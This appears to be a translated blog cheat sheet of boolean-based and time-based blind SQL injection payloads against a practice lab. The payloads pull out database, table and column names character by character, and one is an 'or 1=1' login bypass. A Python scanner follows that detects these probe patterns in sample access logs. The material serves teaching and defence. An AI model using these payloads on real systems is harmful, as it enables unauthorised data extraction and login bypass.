Boolean-based blind injection
length(): returns the length of a string
?id=1' and (length(database()))=8 -- qwe
substr(): extracts a substring (syntax: SUBSTR(str,pos,len))
?id=1' and (ascii(substr(database(),1,1)))=115-- qwe    page returns normally, so the first character of the database name is s
?id=1' and (ascii(substr(database(),2,1)))=101-- qwe    page returns normally, so the second character of the database name is e
security    (the database name recovered character by character)
ascii(): returns the ASCII code of a character [turns the character into a number]
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101-- qwe    if the page returns normally, the first character of the first table name is e
users
and (ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105-- qwe    if the page returns normally, the first character of the first column name in the emails table is i
Time-based blind injection
sleep(n): suspends execution for n seconds
if(expr1,expr2,expr3): conditional; if expr1 is true, expr2 is evaluated, otherwise expr3
?id=1' and if (length(database())=8,sleep(5),1) -- qwe
?id=1' and if ((ascii(substr(database(),1,1))=115),sleep(5),1) -- qwe    response is delayed, so the first character of the database name is s
?id=1' and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe    response is delayed, so the first character of the first table name is e
?id=1' and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe    response is delayed, so the first character of the first column name in the emails table is i
admin ' or 1=1 #    "universal password" payload (login form)
admin' and (length(database()))=8 #
admin') and (length(database()))=8 #
admin' and if (length(database())=8,sleep(5),1) #
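As an added defender-side example that is not part of the original notes: a small Python scanner that flags requests carrying the probe shapes listed above (ascii(substr(...)), length(database()), information_schema lookups, if(...,sleep(n),...)) in constructed access-log lines, and marks a time-based hit as confirmed when the response time matches the sleep(5) delay. The log format, the path names and the 4000 ms threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns derived from the payload shapes in the notes above
# (input is URL-decoded and lower-cased before matching).
BOOLEAN_PATTERNS = [
    r"\bascii\s*\(\s*substr\s*\(",
    r"\blength\s*\(\s*database\s*\(\s*\)\s*\)",
    r"information_schema\.(tables|columns)",
]
TIME_PATTERNS = [
    r"\bsleep\s*\(\s*\d+",
    r"\bif\s*\(.*?,\s*sleep\s*\(",
]

def classify_request(raw_query: str) -> dict:
    """Decode a query string or POST body and report which blind-SQLi
    indicators it contains: {'kind': 'clean'|'boolean-based'|'time-based', 'hits': [...]}."""
    text = unquote_plus(raw_query).lower()
    hits = [p for p in TIME_PATTERNS if re.search(p, text)]
    kind = "time-based" if hits else "clean"
    bool_hits = [p for p in BOOLEAN_PATTERNS if re.search(p, text)]
    if bool_hits and kind == "clean":
        kind = "boolean-based"
    return {"kind": kind, "hits": hits + bool_hits}

# Constructed access-log lines (not real traffic): method path status duration_ms
SAMPLE_LOG = """\
GET /Less-8/?id=1 200 12
GET /Less-8/?id=1%27%20and%20(length(database()))%3D8%20--%20qwe 200 11
GET /Less-9/?id=1%27%20and%20if%20(length(database())%3D8%2Csleep(5)%2C1)%20--%20qwe 200 5014
GET /Less-8/?id=1%27%20and%20(ascii(substr(database()%2C1%2C1)))%3D115--%20qwe 200 10
"""

def scan_log(log_text: str, slow_ms: int = 4000) -> list:
    """Classify every request; a time-based hit paired with a slow response
    is the strongest sign that sleep() actually fired server-side."""
    findings = []
    for line in log_text.splitlines():
        _method, path, _status, ms = line.split()
        verdict = classify_request(path.partition("?")[2])
        if verdict["kind"] == "clean":
            continue
        verdict["path"] = path
        verdict["slow"] = verdict["kind"] == "time-based" and int(ms) >= slow_ms
        findings.append(verdict)
    return findings
```

Run scan_log(SAMPLE_LOG) to get one finding per suspicious line; a boolean-based finding is a hypothesis, while a time-based finding with slow=True is strong evidence.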
Source: https://www.cnblogs.com/sjzdest/p/16948629.html